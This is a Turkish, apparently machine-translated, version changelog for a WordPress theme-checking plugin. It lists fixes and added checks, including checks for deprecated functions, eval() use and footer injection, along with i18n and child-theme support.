  • DOS/UNIX satır sonlandırma stili kontrolleri artık düzgün tema yükleme için bir gerekliliktir.
  • Timthumb sürüm yumru
  • GaryJ tarafından bildirilen birkaç düzeltme
  • 3.2 kullanımdan kaldırılan işlevler eklendi

20110412.1

  • Normal ifadeleri düzeltin
  • En son altbilgi enjeksiyon hack için kontrol eklendi.
  • Yeni içerik işlevini doğru kullanmak için etiketleri düzeltin
  • wporg yükleyici tema kontrolü için yapılan tüm değişikliklerin senkronizasyonu.
  • 3.1 sonrası güncellenmiş kontroller. svn'ye ekran görüntüsü kontrolü eklendi.
  • Bazı durumlarda yanlış bir hata döndürmemek için bağlantıları düzeltin
  • wporg yükleyicide sorunlara neden olan (ve ayrıca gereksiz olan) kontrollerden birini rm
  • Gereksiz işlevleri kontrol tabanından main.php'ye taşıyın.
  • Yalnızca küçük biçimlendirme değişiklikleri (boşluk vb.)
  • wp_link_pages() + düzeltme eval() kontrolü için kontrol ekleyin

20110219.2

  • Birleştirilmiş yeni UI özellikleri Gua Bob
  • Son test edilen tema, temalar listesinde her zaman önceden seçilir.
  • admin_menu.php içindeki sabit php hatası

20110219.1

  • Değişiklikler için kayıt günlüğüne bakın.

20110201.2

  • UI hatası, forum gönderisi desteği Mamaduka'yı düzeltir.
  • Metin etki alanı yirmi olup olmadığını kontrol eder ve etki alanı yok.
  • Div'in sahne Mamaduka'yı kapatmaması düzeltildi.

20110201.1

  • i18n çalışıyor
  • sr_RS de_DE ro_RO, Daniel Tara ve Emil Uzelac'ı destekliyor.
  • Alt tema desteği eklendi, çalışma zamanında ebeveyn VE alt öğeye karşı kontroller yapıldı.
  • İnceleyenler için Trac biçimlendirme düğmesi eklendi.

20101228.3

  • 3.1 için son revizyon (umarım)
  • searchform.php'nin dahil edilip edilmediğini kontrol etmek için cips önerisi (değil
    henüz mükemmel, aramak için daha fazla örneğe ihtiyacınız var).
  • add_theme_page gereklidir, diğerleri işaretlenir ve satırla görüntülenir
    sayılar.
  • Çoğunlukla uluslararasılaştırılmış, şimdi çevirilere ihtiyacı var.
  • Hata düzeltmeleri.

20101228.2

  • Menü kontrolü eklendi.
  • ThemeURI AutohourURI sonuçlara eklendi.
  • Çok sayıda küçük düzeltme.
  • Çeviri başladı.

20101228.1

  • embed_defaults filtre kontrolünü ve stil sayfası dosyası veri kontrolünü düzeltin.

20101226.1

  • WordPress.org yükleyici ile daha kolay senkronizasyon sağlamak için tüm sistem yeniden tasarlandı. Diğer birçok ekleme/çıkarma/değişiklik de.
  • Tema yazarlarının gelecek sürüm için uyumluluk sağlamalarına yardımcı olmak için WordPress 3.1 yönergeleri eklendi.

20101110.7

  • Fopen ve file_get_contents (INFO) için malware.php kontrolleri yeniden eklendi
  • birkaç tanımsız dizin hatası düzeltildi.

20101110.4_r2

  • Sabit Uyarı: stristr() için yanlış parametre sayısı

20101110.4_r1

  • Önerilen.php'ye eko eklendi

20101110.4

  • get_plugins() için kullanımdan kaldırılan işlev çağrısı düzeltildi

20101110.3

  • Sabit tanımsız dizin.

20101110.2

  • Eksik< in main.php
  • lisans.txt VEYA style.css içindeki Lisans etiketleri için koşullu kontroller eklendi
  • UI iyileştirmeleri.